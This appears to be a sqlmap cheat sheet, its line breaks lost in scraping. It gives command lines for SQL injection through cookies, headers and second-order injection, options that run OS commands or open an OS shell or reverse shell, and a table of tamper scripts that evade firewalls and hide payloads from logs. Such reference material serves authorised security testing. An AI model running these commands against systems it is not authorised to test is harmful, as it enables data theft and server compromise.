SQLMap - Cheetsheat

#Inside cookiesqlmap  -u "http://example.com" --cookie "mycookies=*"​#Inside some headersqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"sqlmap -u "http://example.com" --headers="referer:*"​#PUT Methodsqlmap --method=PUT -u "http://example.com" --headers="referer:*"​#The injection is located at the '*'

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs

#Exec commandpython sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami​#Simple Shellpython sqlmap.py -u "http://example.com/?id=1" -p id --os-shell​#Dropping a reverse-shell / meterpreterpython sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3​--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers--crawl = how deep you want to crawl a site--forms = Parse and test forms

​Read this post about how to perform simple and complex second order injections with sqlmap.

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)sqlmap -r r.txt -p id --not-string ridiculous --batch

Remember that you can create your own tamper in python and it's very simple. You can find a tamper example in the Second Order Injection page here.

Tamper

Description

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

base64encode.py

Base64 all characters in a given payload

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"

charunicodeescape.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

escapequotes.py

Slash escape quotes (' and ")

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

modsecurityversioned.py

Embraces complete query with versioned comment

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

multiplespaces.py

Adds multiple spaces around SQL keywords

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

percentage.py

Adds a percentage sign ('%') infront of each character

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

randomcase.py

Replaces each keyword character with random case value

randomcomments.py

Add random comments to SQL keywords

securesphere.py

Appends special crafted string

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

space2comment.py

Replaces space character (' ') with comments

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

space2plus.py

Replaces space character (' ') with plus ('+')

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

uppercase.py

Replaces each keyword character with upper case value 'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'